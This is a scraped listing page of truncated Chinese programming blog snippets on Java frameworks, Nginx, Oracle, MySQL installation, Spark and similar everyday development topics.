转自：http://xiang.lf.blog.163.com/blog/static/127733322201481114456136/ CMake是一个跨平台的程序构建工具，比如起自己编写Makefile方便很多。介绍：http://baike.baidu.com/view/1126160.htm 本文件不介绍CMake的基本语法，下面是篇不错的入门教程： http:
cvc-complex-type.2.3: Element 'beans' cannot have character Cb123456 spring Webgis
cvc-complex-type.2.3: Element 'beans' cannot have character Line 33 in XML document from ServletContext resource [/WEB-INF/backend-servlet.xml] is i
jquery实例:随页面滚动条滚动而自动加载内容 120153216 jquery
<script language="javascript"> $(function (){ var i = 4;$(window).bind("scroll", function (event){ //滚动条到网页头部的高度，兼容ie,ff,chrome var top = document.documentElement.s
将数据库中的数据转换成dbs文件何必如此 sql dbs
旗正规则引擎通过数据库配置器（DataBuilder）来管理数据库，无论是Oracle，还是其他主流的数据都支持，操作方式是一样的。旗正规则引擎的数据库配置器是用于编辑数据库结构信息以及管理数据库表数据，并且可以执行SQL 语句，主要功能如下。 1)数据库生成表结构信息：主要生成数据库配置文件(.conf文
在IBATIS中配置SQL语句的IN方式 357029540 ibatis
在使用IBATIS进行SQL语句配置查询时，我们一定会遇到通过IN查询的地方，在使用IN查询时我们可以有两种方式进行配置参数：String和List。具体使用方式如下： 1.String:定义一个String的参数userIds，把这个参数传入IBATIS的sql配置文件，sql语句就可以这样写： <select id="getForms" param
Spring3 MVC 笔记（一） 7454103 spring mvc bean REST JSF
自从 MVC 这个概念提出来之后 struts1.X struts2.X jsf 。。。。。这个view 层的技术一个接一个！都用过！不敢说哪个绝对的强悍！要看业务，和整体的设计！最近公司要求开发个新系统！
Timer与Spring Quartz 定时执行程序 darkranger spring bean 工作 quartz
有时候需要定时触发某一项任务。其实在jdk1.3，java sdk就通过java.util.Timer提供相应的功能。一个简单的例子说明如何使用，很简单： 1、第一步，我们需要建立一项任务，我们的任务需要继承java.util.TimerTask package com.test; import java.text.SimpleDateFormat; import java.util.Date;
大端小端转换，le32_to_cpu 和cpu_to_le32 aijuans C语言相关
大端小端转换，le32_to_cpu 和cpu_to_le32 字节序 http://oss.org.cn/kernel-book/ldd3/ch11s04.html 小心不要假设字节序. PC 存储多字节值是低字节为先(小端为先, 因此是小端), 一些高级的平台以另一种方式(大端)
Nginx负载均衡配置实例详解 avords
[导读] 负载均衡是我们大流量网站要做的一个东西，下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法，希望对有需要的同学有所帮助哦。负载均衡先来简单了解一下什么是负载均衡，单从字面上的意思来理解就可以解负载均衡是我们大流量网站要做的一个东西，下面我来给大家介绍在Nginx服务器上进行负载均衡配置方法，希望对有需要的同学有所帮助哦。负载均衡先来简单了解一下什么是负载均衡
乱说的 houxinyou 框架敏捷开发软件测试
从很久以前，大家就研究框架，开发方法，软件工程，好多！反正我是搞不明白！这两天看好多人研究敏捷模型，瀑布模型！也没太搞明白. 不过感觉和程序开发语言差不多，瀑布就是顺序，敏捷就是循环. 瀑布就是需求、分析、设计、编码、测试一步一步走下来。而敏捷就是按摸块或者说迭代做个循环，第个循环中也一样是需求、分析、设计、编码、测试一步一步走下来。也可以把软件开发理
欣赏的价值——一个小故事 bijian1013 有效辅导欣赏欣赏的价值
　　第一次参加家长会，幼儿园的老师说："您的儿子有多动症，在板凳上连三分钟都坐不了，你最好带他去医院看一看。"　　回家的路上，儿子问她老师都说了些什么，她鼻子一酸，差点流下泪来。因为全班30位小朋友，惟有他表现最差；惟有对他，老师表现出不屑，然而她还在告诉她的儿子："老师表扬你了，说宝宝原来在板凳上坐不了一分钟，现在能坐三分钟。其他妈妈都非常羡慕妈妈，因为全班只有宝宝
包冲突问题的解决方法 bingyingao eclipse maven exclusions 包冲突
包冲突是开发过程中很常见的问题：其表现有： 1.明明在eclipse中能够索引到某个类，运行时却报出找不到类。 2.明明在eclipse中能够索引到某个类的方法，运行时却报出找不到方法。 3.类及方法都有，以正确编译成了.class文件，在本机跑的好好的，发到测试或者正式环境就抛如下异常： java.lang.NoClassDefFoundError: Could not in
【Spark七十五】Spark Streaming整合Flume-NG三之接入log4j bit1129 Stream
先来一段废话：实际工作中，业务系统的日志基本上是使用Log4j写入到日志文件中的，问题的关键之处在于业务日志的格式混乱，这给对日志文件中的日志进行统计分析带来了极大的困难，或者说，基本上无法进行分析，每个人写日志的习惯不同，导致日志行的格式五花八门，最后只能通过grep来查找特定的关键词缩小范围，但是在集群环境下，每个机器去grep一遍，分析一遍，这个效率如何可想之二，大好光阴都浪费在这上面了
sudoku solver in Haskell bookjovi sudoku haskell
这几天没太多的事做，想着用函数式语言来写点实用的程序，像fib和prime之类的就不想提了（就一行代码的事），写什么程序呢？在网上闲逛时发现sudoku游戏，sudoku十几年前就知道了，学生生涯时也想过用C/Java来实现个智能求解，但到最后往往没写成，主要是用C/Java写的话会很麻烦。现在写程序，本人总是有一种思维惯性，总是想把程序写的更紧凑，更精致，代码行数最少，所以现
java apache ftpClient bro_feng java
最近使用apache的ftpclient插件实现ftp下载，遇见几个问题，做如下总结。 1. 上传阻塞，一连串的上传，其中一个就阻塞了，或是用storeFile上传时返回false。查了点资料，说是FTP有主动模式和被动模式。将传出模式修改为被动模式ftp.enterLocalPassiveMode();然后就好了。看了网上相关介绍，对主动模式和被动模式区别还是比较的模糊，不太了解被动模
读《研磨设计模式》-代码笔记-工厂方法模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 工厂方法模式：使一个类的实例化延迟到子类 * 某次，我在工作不知不觉中就用到了工厂方法模式（称为模板方法模式更恰当。2012-10-29）： * 有很多不同的产品，它
面试记录语 chenyu19891124 招聘
或许真的在一个平台上成长成什么样，都必须靠自己去努力。有了好的平台让自己展示，就该好好努力。今天是自己单独一次去面试别人，感觉有点小紧张，说话有点打结。在面试完后写面试情况表，下笔真的好难，尤其是要对面试人的情况说明真的好难。今天面试的是自己同事的同事，现在的这个同事要离职了，介绍了我现在这位同事以前的同事来面试。今天这位求职者面试的是配置管理，期初看了简历觉得应该很适合做配置管理，但是今天面
Fire Workflow 1.0正式版终于发布了 comsci 工作 workflow Google
Fire Workflow 是国内另外一款开源工作流，作者是著名的非也同志，哈哈.... 官方网站是 http://www.fireflow.org 经过大家努力,Fire Workflow 1.0正式版终于发布了正式版主要变化: 1、增加IWorkItem.jumpToEx(...)方法，取消了当前环节和目标环节必须在同一条执行线的限制，使得自由流更加自由 2、增加IT
Python向脚本传参 daizj python 脚本传参
如果想对python脚本传参数，python中对应的argc, argv(c语言的命令行参数)是什么呢？需要模块：sys 参数个数：len(sys.argv) 脚本名： sys.argv[0] 参数1： sys.argv[1] 参数2： sys.argv[
管理用户分组的命令gpasswd dongwei_6688 passwd
NAME： gpasswd - administer the /etc/group file SYNOPSIS： gpasswd group gpasswd -a user group gpasswd -d user group gpasswd -R group gpasswd -r group gpasswd [-A user,...] [-M user,...] g
郝斌老师数据结构课程笔记 dcj3sjt126com 数据结构与算法
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
yii2 cgridview加上选择框进行操作 dcj3sjt126com GridView
页面代码 <?=Html::beginForm(['controller/bulk'],'post');?> <?=Html::dropDownList('action','',[''=>'Mark selected as: ','c'=>'Confirmed','nc'=>'No Confirmed'],['class'=>'dropdown',])
linux mysql fypop linux
enquiry mysql version in centos linux yum list installed | grep mysql yum -y remove mysql-libs.x86_64 enquiry mysql version in yum repositoryyum list | grep mysql oryum -y list mysql* install mysq
Scramble String hcx2013 String
Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively. Below is one possible representation of s1 = "great":
跟我学Shiro目录贴 jinnianshilongnian 跟我学shiro
历经三个月左右时间，《跟我学Shiro》系列教程已经完结，暂时没有需要补充的内容，因此生成PDF版供大家下载。最近项目比较紧，没有时间解答一些疑问，暂时无法回复一些问题，很抱歉，不过可以加群（334194438/348194195）一起讨论问题。 ----广告-----------------------------------------------------
nginx日志切割并使用flume-ng收集日志 liyonghui160com
nginx的日志文件没有rotate功能。如果你不处理，日志文件将变得越来越大，还好我们可以写一个nginx日志切割脚本来自动切割日志文件。第一步就是重命名日志文件，不用担心重命名后nginx找不到日志文件而丢失日志。在你未重新打开原名字的日志文件前，nginx还是会向你重命名的文件写日志，linux是靠文件描述符而不是文件名定位文件。第二步向nginx主
Oracle死锁解决方法 pda158 oracle
　select p.spid,c.object_name,b.session_id,b.oracle_username,b.os_user_name from v$process p,v$session a, v$locked_object b,all_objects c where p.addr=a.paddr and a.process=b.process and c.object_id=b.
java之List排序 shiguanghui list排序
在Java Collection Framework中定义的List实现有Vector，ArrayList和LinkedList。这些集合提供了对对象组的索引访问。他们提供了元素的添加与删除支持。然而，它们并没有内置的元素排序支持。　　你能够使用java.util.Collections类中的sort()方法对List元素进行排序。你既可以给方法传递
servlet单例多线程 utopialxw 单例多线程 servlet
转自http://www.cnblogs.com/yjhrem/articles/3160864.html 和 http://blog.chinaunix.net/uid-7374279-id-3687149.html Servlet 单例多线程 Servlet如何处理多个请求访问？Servlet容器默认是采用单实例多线程的方式处理多个请求的：1.当web服务器启动的